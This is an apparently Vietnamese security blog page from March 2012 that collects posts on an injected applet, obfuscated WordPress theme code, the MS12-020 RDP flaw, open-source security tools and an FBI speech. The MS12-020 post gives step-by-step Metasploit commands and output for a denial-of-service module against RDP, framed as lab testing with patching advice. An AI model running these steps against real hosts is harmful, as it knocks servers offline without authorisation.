Tổng quát về Tội phạm máy tính

- Khái niệm - Đặc điểm - Tính chất

Tố giác tội phạm máy tính như thế nào?

Cách thức, thể thức và trình tự

Miễn phí bản quyền phần mềm

Tập hợp bản quyền miễn phí theo ngày

29 March 2012

[Phân tích] Vụ chèn mã độc JavaApplet tại KBCHN.NET

Trong một loạt các sự kiện liên quan đến SINH TỬ LỆNH và các site bị tấn công, ngày 29/3/2012, trên HVAonline, thành viên có nickname miyumi2 đã có bài phân tích việc trang web kbchn.net lề trái ("phản động") bị chèn JavaApplet

 Code sau khi được anh Conmale phân tích

Đây là cách thức tương đối phổ biến trong thời gian gần đây, đặc biệt là việc sử dụng các ứng dụng của facebook

28 March 2012

[Security] Analyzing Wordpress Themes


TimThumb is definitely one of the most valuable files (i.e., PHP scripts), that I want to find during a
Penetration Test, as earlier versions between 1.0 and 1.32 has a flaw that enables an attacker to
remotely cache PHP scripts[1,2], allowing remote code execution. It is an image tool often used in
WordPress themes, making cropping, zooming and resizing a lot easier, and it is open source of course.

The amount of websites that use this script are extreme, but most have hopefully upgraded to the
newest, completely re-written version 2.X, that combats the critical remote cache vulnerability but also
other problems too. At least 328 themes and 76 plug-ins [4], use this script where the file is occasionally
renamed, meaning an empty search result for “timthumb.php”, is not equal to it isn’t there.
One of the ways to search for this script, is to use WPScan [5], another is to use shell scripting as shown
in a later figure. WPScan is a vulnerability scanner for WordPress powered sites that uses black-box
methods to identify problematic themes and plug-ins.
The other way as mentioned earlier, is to use shell scripting, which in this case, isn’t rocket science.
The shell scripting example is often enough as it searches through /var/www/ and all subdirectories for
files, where all files are checked for the “timthumb” string. Often it is only the name of the file, but not
the  actual  contents  that  has  been  changed  when  it  comes  to TimThumb. This is important when it
comes  to  the  decision  of  searching  for  the filename, or the string within the file, where the last is
generally more successful.

Besides TimThumb, there’s more
It’s rarely, if at all, that I’ve seen Cross-Site Scripting and SQL Injection vulnerabilities inside the theme
files, but it’s rather normal they can and will occur in plug-ins. For example, recently I discovered a
rather interesting file within a theme, used on a few well known websites. The administrators of these
were of course contacted about the potential risk this file poses.
The theme I’m referring to, is the “Black Buttons Theme” [6,7], where the file is “footer.php”. You might
wonder, what kinds of danger can a file, used to e.g., display credits from the theme developer, pose?
As the footer.php file was heavily obfuscated, there was most likely something to find, as there usually is
with such files. Even though, it’s not a backdoor, it can in worst case, be used as a backdoor.
 Even though the developer, implemented this as some sort of “copyright protection”, and even stated it
is “prohibited” to reverse engineer the file, it doesn’t legally apply in countries like Denmark, where you
can buy a product and take it apart, as long as you’re not endangering anyone including yourself.
Reverse engineering the file, is a longer process but in essence, it’s quite simple and in some cases a
necessary step to improve the security of your website in case you’re using a theme that has obfuscated
code, that can virtually contain anything from good to bad.
If 1 out of 25 files contain obfuscated code, wouldn’t you be interested in knowing what it contains?
Imagine the developer’s computer, website, repository, svn, etc., gets compromised, and the attackers
update the file with the obfuscated code. How are you going to tell the good code from the bad code?
In this case, it’s a possible security risk that should be assessed like everything else.
 Looking  at this code, it may seem like gibberish at first hand. But as I’ve seen this type of encoding
countless times before, I know that it’s also exactly the same thing the blackhats, script kiddies and
hacktivists, etc., do when they want to hide the content of their files. Naturally, I get suspicious.
From a quick view, it’s obvious to many that the file is Base64 encoded, and the easiest way to begin, is
to change eval(), to print() or echo, as this will not execute the encoded / obfuscated PHP code, but
instead print it to the screen when the script is accessed, via an Internet Browser or CLI [8].
When this has been done, more obfuscated is often presented, almost worse than before in some cases:
 Using variable names like the above is another way to confuse humans. It doesn’t really confuse me, it
just makes me more eager to decode everything and find out the reason as to why, the person that
developed the script chose to encode and obfuscate it heavily
 As you can see, it doesn’t get easier, but we don’t have to translate all of these functions into human
readable code. Because we can in some cases, make the machine do most of the work for us.
After some time, we eventually end up with the original code that we want to study, and perhaps fix.
What was so important  to protect?
The file appears to be non-malicious, but it does contain some rather interesting code as mentioned
earlier, as it doesn’t just print the credits, the script does a lot more than just that
 This function (show_footer_links), specifies which website to contact, and which script / URI it should try
to get information from. It may seem, like a small issue, but there are plenty of bad scenarios available.
In the simplest scenario, the developer’s website gets compromised, and the attacker updates the script
that your site tries to reach to display the dynamic footer. At this point, the attacker can do exactly the
same you can on your site, and the possibilities are many.
The attacker may steal your cookies and hijack your session, place a JavaScript keylogger on the website,
redirect GET- or POST-requests for the login script to his site instead, that would effectively steal all login
credentials. He or she could also try to enumerate the type of router you have, in some cases steal your
router password, and also try to locate your real world location.
In this very same scenario, it isn’t just your website that’s been compromised via the developer’s web-site; it’s anyone who uses this theme, which could be thousands of websites, with, thousands of users.
Other dangerous scenarios
Man in the Middle attacks, could also be performed against the remote website, with methods such as
BGP Hijacking, and in case the (DNS) name-server that your website uses, is vulnerable to DNS Cache
Poisoning, then an attacker could potentially attack the domain your website resolves, when it needs to
display the footer, where the new IP-address of the remote script that returns the info for the footer,
would originate from the attackers website.
Another simpler scenario could’ve been that the code itself had been infected at some time during
development or after the release. After all, if the website that offers the theme gets compromised, an
attacker can also alter the code this way. Changing the footer.php file, to point to the attacker’s site
instead of the developer’s site, would raise little suspicion before the actual infection takes place.
Knowing this, it’s hopefully clearer now, that this script is a risk, and should be considered dangerous.

25 March 2012

[Security] MS12-020 RDP Vulnerability overview and testing

By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”

In short the system would crash and have a “blue screen of death” thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that’s not because the choose to be however most places have a “patch cycle” which require extensive testing prior to deployment.
As explained by the fine people over at ISC Diary The Microsoft released patch has several reference KB’s which includes ” KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you’ll see on a Windows system, when installed, depends on the version of the OS you’re running. For Windows 7 you’ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always before applying any patch ensure that you read the release notes.
We recently patched our internet facing servers that had RDP enabled and everything went well with the exception of one server that we were unable to log back into via RDP, we had to gain access to the server via the ILO port then applied a few additional patches then rebooted and that seen to solve the issue.Now for the fun part if you would like to test the proof of concept exploit for this vulnerability grab a copy of Metasploit follow the steps below.
My Test setup:

Linux (SolusOS)
VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 3389 yes The target port

msf auxiliary(ms12_020_maxchannelids) > set RHOST
msf auxiliary(ms12_020_maxchannelids) > run

[*] – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] – 210 bytes sent
[*] – Checking RDP status…
[+] seems down
[*] Auxiliary module execution completed

RHOST = The vulnerable host that is running a vulnerable version of RDP
Screenshot of server 2008 reacting to the exploit

How go on out and patch your systems and if you have some time load Metasploit on a host of your choice and do some testing.

If you don’t need RDP open to the external world disable it
Change the default port everyone know its 3389
Enable network level authentication (NLA)



Via securegossip ]

24 March 2012

[Report] IBM X-Force 2011 - Trend and Risk report

[Security] Haters and Zombies Inc

Scammers put their philosophical shoes back on with fugit irreparabile timeline and mortem re-loaded baits

Hate it or not, the Timeline’s here to stay. You know it, I know it, but does everybody else on Facebook know it? As we’re living in a revolution-prone age, nobody actually expects oppressive states of fact to be accepted without even the slightest signs of opposition. Some may argue that what’s unbearable to me, might be nothing more than a minor discomfort to others. The nice thing about it is that in the online social world, you can have as many “springs” as you want for as many causes as you want. After all, rising to arms in this environment simply means creating a page and then using it for a healthy crop of Likes to promote your cause.

Speaking of revolutions, here’s our very own “Timeline spring”, complete with a strong message “I hate Facebook Timeline” and one big fat planned action: “sending a report to Facebook staff, to remove facebook timeline!”

[ Via ]

23 March 2012

[Ebook] Forensic Science

[RAT] Chuyên mục "Điều tra qua thư khán giả" của ANTV

Tình cờ bật qua kênh ANTV và xem chương trình "Điều tra theo thư khán giả" thấy một vài điểm bất hợp lý và dễ trở thành "mồi ngon" cho báo chí + luật sư. Bài viết dạng câu hỏi... vừa chém gió, vừa tìm hiểu :))

- ANTV có chức năng điều tra ? hay có chức năng phối hợp ?
- Điều tra viên, Cán bộ điều tra hay Phóng viên
Chưa rõ vai trò của họ là gì nhưng thấy mặc áo an ninh chắc là cán bộ điều tra :)
Chức năng và thẩm quyền của họ đến đâu ? Không phải cứ vác theo 1 cái máy camera rồi "điều tra".
Bởi, suy cho cùng.... theo thư của khản giả... thực chất mới chỉ là 1 phía mà thôi
- Trình độ chuyên môn của các "phóng viên" ứng xử còn NON và dễ bị động.... dễ rơi vào bẫy "lý luận" cũng như thực tiễn của dân :)

Vài lời chém gió !

22 March 2012

[Tool] Open source apps for anti-virus, anti-spam, firewalls, encryption, security gateways and more



Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

The self-proclaimed "absolute best SPAM fighting weapon that the world has ever known," ASSP sits on your SMTP servers to stop spam and scan for viruses. Features include browser-based setup, support for most SMTP servers, automatic whitelists, early sender verification, Bayesian filters and more. Operating System: OS Independent.

2. MailScanner

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

Downloaded more than 1.3 million times by users in 225 countries, MailScanner is a free e-mail security package for mail servers. It incorporates SpamAssassin, ClamAV and a number of other tools to block spam and malware. Operating System: OS Independent.

3. SpamAssassin

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

"The powerful #1 open-source spam filter," SpamAssassin uses header and text analysis, Bayesian filtering, DNS blocklists, collaborative filtering databases and other techniques to block spam. The project is managed by the Apache Foundation, and it's been incorporated into a number of other open source and commercial products. Operating System: primarily Linux and OS X, although Windows versions are available.

4. SpamBayes

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

As you might guess from the name, this project offers a group of Bayesian filters for blocking spam. The site includes versions for Outlook, Outlook Express, Windows Live Mail, IncrediMail, Thunderbird, Gmail, Yahoo Mail and others. Operating System: OS Independent.

5. Nixory

Replaces: SpyBot Search and Destroy, AdAware

Nixory removes and block malicious tracking cookies (aka, spyware) from your system. It supports Mozilla Firefox, Internet Explorer and Google Chrome, and it won't slow your system while you surf. Operating System: OS Independent.

6. ClamAV

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

This tremendously popular anti-virus engine has been incorporated into numerous security products and calls itself "the de facto standard for mail gateway scanning." The open source version runs on UNIX or Linux mail servers, but the website also offers a version called Immunetfor individual Windows PCs. Operating System: Linux.

7. ClamTK

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

ClamTK makes ClamAV a little bit easier to use by providing a graphical interface for the anti-virus engine. Like the original, this one runs on Linux and scans on demand. Operating System: Linux.

8.ClamWin Free Antivirus

Replaces Kaspersky Anti-Virus, McAfee AntiVirus Plus, Norton Anti-Virus

Based on ClamAV, ClamWin protects more than 600,000 PCs from viruses and malware. Note that unlike most commercial anti-virus packages, ClamWin does not offer an on-access real-time scanner; in order to scan incoming files, you'll need to save them and then run a scan manually before opening or running the files. Operating System: Windows.

9. P3Scan

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

With P3Scan, you can set up a transparent proxy server that provides anti-virus and anti-spam protection. Operating System: Linux.


10. Amanda

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Protecting more than 500,000 systems worldwide, Amanda lays claim to the title "most popular open source backup and recovery software in the world." In addition to the community version, it's also available in a supported enterprise edition or as an appliance. Operating System: Windows, Linux, OS X.

11. Areca Backup

Replaces: NovaBackup

Aiming for a balance between simplicity and versatility, Areca offers an easy graphical interface with many options for creating and interacting with archived files. Key features include compression, encryption, delta backup support, archive merges and more. Operating System: Windows, Linux.

12. Bacula

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Designed for enterprise users, Bacula backs up multiple systems across a network. Commercial support and services for the popular product are available through Bacula Systems. Operating System: Windows, Linux, OS X.

13. Clonezilla

Replaces: Norton Ghost

Created as an alternative to Ghost, Clonezilla can clone single or multiple systems very quickly. It comes in two versions: Clonezilla Live for individual systems and Clonezilla SE for massive networks. Operating System: Windows, Linux, OS X.

14. Partimage

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Partimage can create a complete image of your system, which is useful if you need to recover from a full system crash or if you want to configure multiple systems with exactly the same software. It can also create a recovery partition on your drive. Operating System: Linux.

15. Redo

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Calling itself the "easiest, most complete disaster recovery solution available," Redo offers backup, restore and bare-metal recovery capabilities. Even in the most severe emergencies where you must completely replace a drive, Redo claims it can get you back up and running with all of your programs and files in just 10 minutes. Operating System: Linux.


16. Chromium

Replaces: Microsoft Internet Explorer

The open source version of Google Chrome, Chromium tends to be faster and more secure than competing browsers. Key security features include sandboxing, automatic updates, SafeBrowsing and more. Operating System: Windows, Linux, OS X.

17. Dooble

Replaces: Microsoft Internet Explorer

Dooble's developers have created this newer browser with an eye on safety and ease of use. Unlike most other browsers, it automatically encrypts all traffic for greater privacy and security. Operating System: Windows, Linux, OS X.

18. Tor

Replaces: Microsoft Internet Explorer

Tor protects your identity by providing anonymity while you browse the Web. It's used by journalists, activists, whistle-blowers and others concerned that someone might be snooping on their online activities. Operating System: Windows, Linux, OS X.

Browser Add-Ons

19. Web of Trust (WOT)

Replaces: McAfee SiteAdvisor Plus

Downloaded more than 33 million times, this popular add-on for Firefox, Internet Explorer, Chrome, Safari or Opera lets users know when they've strayed into websites that are questionable or insecure. It utilizes user ratings to identify sites that perpetuate scams, collect personal information or include unsuitable content, and it ranks them with a green-yellow-red classification system. Operating System: Windows, Linux, OS X.

20. PasswordMaker

Replaces Kaspersky Password Manager, Roboform

Using the same password all the time puts you at risk, but many people do it anyways because it's so difficult to remember a lot of different passwords. This browser add-on offers a better solution for the problem by creating unique passwords for each site you visit and storing them in an encrypted file that you access with a single master password. Operating System: Windows, Linux, OS X.

Data Removal

21. BleachBit

Replaces Easy System Cleaner

This helpful utility cleans up your system to protect your privacy and improve performance. It frees up disk space by cleaning junk from more than 90 applications, erasing temporary files, deleting cache and browsing history, and "shredding" unwanted files. Operating System: Windows, Linux.

22. Eraser

Replaces BCWipe Enterprise

Like BleachBit, Eraser "shreds" deleted files so that they cannot be recovered. It helps protect sensitive information by rewriting over deleted files several times with random data. Operating System: Windows

23. Wipe

Replaces BCWipe Enterprise

Wipe offers the same functionality as Eraser, but it's for Linux instead of Windows. The site also offers a wealth of information for those interested in learning more about how file "shredding" works. Operating System: Linux.

24. Darik's Boot and Nuke

Replaces Kill Disk, BCWipe Total WipeOut

While Eraser and Wipe delete single files, DBAN securely deletes entire disks. It's very helpful when donating or disposing of an old system. Operating System: OS Independent.

Data Loss Prevention

25. OpenDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

OpenDLP is a "agent- and agentless-based, centrally-managed, massively distributable data loss prevention tool." It allows security or compliance managers to scan thousands of systems simultaneously via agents or perform agentless data discovery against a MySQL or Microsoft SQL server. Operating System: Windows.

26. MyDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

MyDLP can block credit card numbers, social security numbers, or sensitive files from being transmitted via e-mail, printers, the Web or removable devices. In addition to the free community version, it also comes in a paid enterprise version. Operating System: Windows, Linux, VMware.


27. AxCrypt

Replaces McAfee Anti-Theft, CryptoForge

With nearly 2.5 million registered users, AxCrypt claims to be the "leading open source file encryption software for Windows." It integrates with Windows Explorer—to use it, you simply right-click to encrypt a file or double-click to decrypt. Operating System: Windows.

28. Gnu Privacy Guard

Replaces PGP Universal Gateway Email Encryption

This Gnu project is a command-line implementation of the popular OpenPGP encryption standard. It supports ElGamal, DSA, RSA, AES, 3DES, Blowfish, Twofish, CAST5, MD5, SHA-1, RIPE-MD-160 and TIGER encryption algorithms. Operating System: Linux.

29. GPGTools

Replaces PGP Universal Gateway Email Encryption

Mac users can download this version of GPG for a more user-friendly way to encrypt e-mail and files. The website includes quite a bit of help and tutorials for new users, which make it even easier to get started using the app. Operating System: OS X.

30. gpg4win

Replaces Cypherus

And this version offers GPG for Windows users, complete with a GUI. It installs quickly and easily, and it protects both files at rest and mail messages. Operating System: Windows.

31. PeaZip

Replaces WinZip

While it's really a compression utility not an encryption tool, PeaZip also offers strong encryption capabilities, which is why we included it in this section of the list. It also includes two-factor authentication capabilities and secure deletion. Operating System: Windows, Linux.

32. Crypt

Replaces McAfee Anti-Theft, CryptoForge

At just 44KB, Crypt is one of the lightest weight encryption utilities available. And because it can encrypt 3MB worth of data in just 0.7 seconds, it's also one of the fastest. However, it doesn't have a GUI, so you'll need to be comfortable with the command line in order to use it. Operating System: Windows.

33. NeoCrypt

Replaces McAfee Anti-Theft, CryptoForge

NeoCrypt supports multiple encryption algorithms, including AES, DES, Triple-DES, IDEA, RC4, RC5, CAST-128, BlowFish, SkipJack. It runs from an easy-to-use GUI, and it also integrates with the Windows Shell so that you can encrypt and decrypt files right from Windows Explorer. Operating System: Windows.

34. LUKS/cryptsetup

Replaces PGP Whole Disk Encryption

Short for "Linux Unified Key Setup," LUKS calls itself "the standard for Linux hard disk encryption." While many of the other apps on our list encrypt files one by one, LUKS encrypts your entire drive. Operating System: Linux.

35. FreeOTFE

Replaces PGP Whole Disk Encryption

Like LUKS, this app encrypts an entire drive. With it you can create and encrypt virtual disks on your hard drive. It's also highly portable and can run from a thumb drive. Operating System: Windows.

36. TrueCrypt

Replaces PGP Whole Disk Encryption

One of the most popular open source disk encryption options, TrueCrypt boasts more than 22 million downloads. Thanks to parallelization and pipelining technology, it offers fast reads and writes 0f encrypted information. Operating System: Windows.

Secure File Transfer

37. WinSCP

Replaces CuteFTP, FTP Commander

Extremely popular, the award-winning WinSCP includes an SFTP client, SCP client, FTPS client and FTP client. It offers two different interfaces and also includes an integrated text editor. Operating System: Windows.

38. FileZilla

Replaces CuteFTP, FTP Commander

While WinSCP offers only a client version, FileZilla offers both a client version and a version that allows you to set up your own FTP server. It supports FTP, FTPS and SSH transfer protocol. Operating System: Windows, Linux, OS X.


Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit

The Open Digital Evidence Search and Seizure Architecture, aka "ODESSA," offers several different tools that for examining and reporting on digital evidence. This is an older project, but still valuable. Operating System: Windows, Linux, OS X.

40.The Sleuth Kit/Autopsy Browser

Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit

These two apps work together: The Sleuth Kit offers command line tools for conducting digital investigations, and Autopsy Browser offers a browser-based GUI for accessing those tools. The project also now includes a Hadoop framework for large-scale data analysis. Operating System: Windows, Linux, OS X.

Gateway/Unified Threat Management Appliances

41. Endian Firewall Community

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Endian Firewall Community can turn any PC (including pretty old ones) into a gateway security appliance complete with a firewall, application-level proxies with antivirus support, virus and spam-filtering for email, Web content and a VPN. Supported versions of the software and hardware appliances are also available on the site. Operating System: Linux.

42. Untangle Lite

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Similar to Endian, Untangle Lite also helps users create their own gateway security appliances. In addition, Untangle offers commercial products, and you can download each of the individual apps included in Untangle Lite (firewall, intrusion prevention, attack blocker, etc.) separately. Operating System: Linux.

43. ClearOS

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

ClearOS combines gateway security functionality with the capabilities of a small business server. It offers networking, groupware, a mail server, a Web server and more. Paid support and hardware are also available. Operating System: Linux.
Intrusion Detection

44. Open Source Tripwire

Replaces Tripwire

Standard Tripwire is now a closed source project, but the community has continued developing the open source version released in 2000. It monitors the content of files and alerts network managers when those files have changed, alerting them to possible intrusions. Operating System: Windows, Linux.


Replaces Corero IPS, < ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/">HP Tipping Point IPS, Sophos HIPS

In addition to file integrity checking, OSSEC also performs log analysis, policy monitoring, rootkit detection and real-time alerting to help prevent and detect intrusions into your network. It's downloaded more than 5,000 times per month and has won numerous awards. Operating System: Windows, Linux.


Replaces Tripwire

AFICK, short for "Another File Integrity Checker," offers similar functionality as Tripwire. It's portable, fast and runs from a GUI or the command line. Operating System: Windows, Linux.

47. Snort

Replaces Corero IPS, < ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/">HP Tipping Point IPS, Sophos HIPS

With millions of downloads and more than 400,000 registered users, Snort claims to be "the most widely deployed IDS/IPS technology worldwide." Operating System: Windows, Linux OS X.
Network Firewalls

48. IPCop

Replaces Barricuda NG Firewall, Check Point Appliances

Like most of the other apps on our Firewall list, IPCop turns a PC into a Linux-based firewall to protect your network. This one is designed for home or SOHO users, and it boasts an easy-to-use Web interface. Operating System: Linux.

49. Devil-Linux

Replaces Barricuda NG Firewall, Check Point Appliances

Although it was originally designed to offer firewall and router functionality, Devil-Linux can also operate as a server for many applications, including mail hosting. Created by IT administrators for IT administrators, it boasts top-notch security and excellent customization capabilities. Operating System: Linux.

50. Turtle Firewall

Replaces Barricuda NG Firewall, Check Point Appliances

Designed to be simple and fast, Turtle allows network managers to configure it via a Web interface or by modifying XML files. The website also includes some good introductory information on the nature of firewalls. Operating System: Linux.

51. Shorewall

Replaces Barricuda NG Firewall, Check Point Appliances

Shorewall doesn't claim to be the easiest Linux firewall to use, but it does claim to be "the most flexible and powerful." You can use it on a system functioning as a dedicated firewall, as a multi-function gateway/router/server or as a standalone GNU/Linux PC. Operating System: Linux.

Network Firewalls (continued from previous page)

52. Vuurmuur

Replaces Barricuda NG Firewall, Check Point Appliances

Vuurmuur is designed to be both simple and powerful. In addition to standard firewall capabilities, it also supports traffic shaping and offers advanced monitoring capabilities. Operating System: Linux.

53. m0n0wall

Replaces Barricuda NG Firewall

Although it was designed for embedded PCs and appliance, m0n0wall can also run on a standalone PC running FreeBSD. It requires less than 12MB of space and boots in less than 25 seconds. Operating System: FreeBSD.

54. pfSense

Replaces Barricuda NG Firewall, Check Point Appliances

This m0n0wall fork is also based on BSD, but is designed for regular computers, not embedded hardware. It's been downloaded more than 1 million times and currently runs on more than 100,000 networks, including large corporations and universities as well as small home networks. Operating System: FreeBSD.

55. Vyatta

Replaces Cisco products

The "core" Vyatta software allows users to make their own firewalls/networking appliances and routers. The company also offers paid software and hardware. Operating System: Linux.

Network Monitoring

56. Wireshark

Replaces: OmniPeek, CommView

Calling itself the "world's foremost network protocol analyzer," Wireshark makes it easy to capture and analyze network traffic. Commercial products and services related to the software are available through Riverbed Technology. Operating System: Windows, Linux, OS X.

57. tcpdump/libpcap

Replaces: OmniPeek, CommView,

Tcpdump is a command line packet analyzer, and libpcap is a C/C++ library for network traffic capture. Working together, the two provide a good network monitoring solution, but, lacking a GUI, they are not particularly user-friendly. Operating System: Linux.

58. WinDump

Replaces: OmniPeek, CommView

Managed by Riverbed Technology (which also owns Wireshark), WinDump ports tcpdump to the Windows platform. This site also includes the WinPcap library and drivers for traffic capture. Operating System: Windows.
Password Crackers

59. Ophcrack

Replaces Access Data Password Recovery Toolkit, Passware

From time to time, everyone needs to recover a lost or unknown password. This password cracker uses the rainbow tables method to recover unknown passwords, and it also includes a brute force module for simple passwords. Operating System: Windows.

60. Access Data Password Recovery Toolkit, Passware

John the Ripper is particularly good at cracking weak passwords, but in order to use it, you'll need a list of commonly used passwords. You can buy password lists or a pro version of the software from the same site. Operating System: Windows, Linux, OS X.

Password Management

61. KeePass Password Safe

Replaces Kaspersky Password Manager

This popular password manager stores all of your passwords in an encrypted database. You'll only need to remember one master password, while this easy-to-use, lightweight app helps protect you from identity thieves. Operating System: Windows.

62. KeePassX

Replaces Kaspersky Password Manager

If you use OS X or Linux, try this fork of KeePass. Plus, it adds a few features not in the original and runs on Windows as well. Operating System: Windows, Linux, OS X.

63. Password Safe

Replaces Kaspersky Password Manager

Downloaded more than 1 million times, Password Safe is another popular open source option for protecting your passwords. Like KeePass, it's lightweight and stores your encrypted passwords in a database so that you only need to recall one master password. Operating System: Windows.
User Authentication

64. WiKID

Replaces Entrust IdentityGuard, Vasco Digipass, RSA's SecurID

WiKID boasts "two-factor authentication without the hassle factor." In addition to the free community version, it also comes in a supported enterprise version which also adds additional functionality. Operating System: OS Independent.
Web Filtering

65. DansGuardian

Replaces McAfee Family Protection

NetNanny, CyberPatrol

This award-winning content filter uses phrase matching, PICS filtering, URL filtering and other methods to block objectionable content. Note that this software does not run on individual PCs; it runs on an OS X or Linux server to protect the rest of your network. Operating System: Linux, OS X.
 [ Via ]

[Security] Combating Threats in the Cyber World: Outsmarting Terrorists, Hackers, and Spies

Good afternoon. I am indeed honored to be here, and gratified to be back in San Francisco.

A few weeks ago, there was a story in The New York Times about a woman who was taking a break from work. She was watching YouTube videos on her iPhone when a man walked up, pointed a gun at her, grabbed the phone, and ran.

A New York City police officer responded to the call and told her not to worry, that he would find her phone. He grabbed his own phone, opened the “Find My iPhone” app, and typed in the victim’s Apple ID. In seconds, a phone icon popped up, showing that the subject was near 8th Avenue and 51st Street. The officer and his partner headed that way.

As they pulled up, the officer pushed a button on his phone, and they began to hear a pinging noise some 20 feet away. The officer hit “Play” once more, and they followed the pinging to its source, which turned out to be in the man’s sock. The Times reporter pointed out that had the subject been tech savvy, he might have known how to disable the iCloud setting and stop the trace.

If only every case could be solved so easily, and in less than 30 minutes.

Technology has become pervasive as a target. It has also been used as a means of attack. But this story illustrates our use of technology as an investigative tool. It also illustrates the power of innovative thinking and fast action—the very tools we need to stop those who have hijacked cyber space for their own ends.

Technology is moving so rapidly that from a security perspective, it is difficult to keep up. Consider the evolution of cyber crime in just the past decade.

When I was the U.S. Attorney here in 2000, we worked with the Royal Canadian Mounted Police to track down a Canadian teenager known as “Mafiaboy.” He was responsible for the largest denial of service attack at that time. He targeted eBay, Yahoo, E*Trade, Global Crossing, and CNN, just to see if he could shut them down…and he could and did.

When he was finally caught, the 15-year-old was reportedly at a sleepover at a friend’s house, eating junk food and watching “Goodfellas.” He said at the time that he did not understand the consequences of his actions. That now seems like the good old days.

Traditional crime—from mortgage and health care fraud to child exploitation—has migrated online. Terrorists use the Internet as a recruiting tool, a moneymaker, a training ground, and a virtual town square, all in one.

At the same time, we confront hacktivists, organized criminal syndicates, hostile foreign nations that seek our state secrets and our trade secrets, and mercenaries willing to hack for the right price. And we have seen firsthand what happens when countries launch cyber attacks against other nations as a means of exerting power and control.

Today we will discuss what we in the FBI view as the most dangerous cyber threats, what we are doing to confront these threats, and why it is imperative that we work together to protect our intellectual property, our infrastructure, and our economy.

Let me begin with cyber threats to our national security.

Terrorists are increasingly cyber savvy. Much like every other multi-national organization, they are using the Internet to grow their business and to connect with like-minded individuals. And they are not hiding in the shadows of cyber space.

Al Qaeda in the Arabian Peninsula has produced a full-color, English-language online magazine. They are not only sharing ideas, they are soliciting information and inviting recruits to join al Qaeda.

Al Shabaab—the al Qaeda affiliate in Somalia—has its own Twitter account. Al Shabaab uses it to taunt its enemies—in English—and to encourage terrorist activity.

Extremists are not merely making use of the Internet for propaganda and recruitment. They are also using cyber space to conduct operations.

The individuals who planned the attempted Times Square bombing in May 2010 used public web cameras for reconnaissance. They used file-sharing sites to share sensitive operational details. They deployed remote conferencing software to communicate. They used a proxy server to avoid being tracked by an IP address. And they claimed responsibility for the attempted attack—on YouTube.

To date, terrorists have not used the Internet to launch a full-scale cyber attack. But we cannot underestimate their intent. In one hacker recruiting video, a terrorist proclaims that cyber warfare will be the warfare of the future.

Terrorist use of the Internet is not our only national security concern. As we know, state-sponsored computer hacking and economic espionage pose significant challenges.

Just as traditional crime has migrated online, so, too, has espionage. Hostile foreign nations seek our intellectual property and our trade secrets for military and competitive advantage.

State-sponsored hackers are patient and calculating. They have the time, the money, and the resources to burrow in, and to wait. They may come and go, conducting reconnaissance and exfiltrating bits of seemingly innocuous information—information that in the aggregate may be of high value.

You may discover one breach, only to find that the real damage has been done at a much higher level.

Unlike state-sponsored intruders, hackers for profit do not seek information for political power—they seek information for sale to the highest bidder. These once-isolated hackers have joined forces to create criminal syndicates. Organized crime in cyber space offers a higher profit with a lower probability of being identified and prosecuted.

Unlike traditional crime families, these hackers may never meet, but they possess specialized skills in high demand.

They exploit routine vulnerabilities. They move in quickly, make their money, and disappear. No company is immune, from the Fortune 500 corporation to the neighborhood “mom and pop” business.

We are also worried about trusted insiders who may be lured into selling secrets for monetary gain. Perimeter defense may not matter if the enemy is inside the gates.

The end result of these developments is that we are losing data. We are losing money. We are losing ideas and we are losing innovation. And as citizens, we are increasingly vulnerable to losing our information. Together we must find a way to stop the bleeding.

We in the FBI have built up a substantial expertise to address these threats, both here at home and abroad.

We have cyber squads in each of our 56 field offices, with more than 1,000 specially trained agents, analysts, and forensic specialists. Given the FBI’s dual role in law enforcement and national security, we are uniquely positioned to collect the intelligence we need to take down criminal networks, prosecute those responsible, and protect our national security.

But we cannot confront cyber crime on our own.

Borders and boundaries pose no obstacles for hackers. But they continue to pose obstacles for global law enforcement, with conflicting laws, different priorities, and diverse criminal justice systems. With each passing day, the need for a collective approach—for true collaboration and timely information sharing—becomes more pressing.

The FBI has 63 legal attaché offices that cover the globe. Together with our international counterparts, we are sharing information and coordinating investigations. We have special agents embedded with police departments in Romania, Estonia, Ukraine, and the Netherlands, working to identify emerging trends and key players.

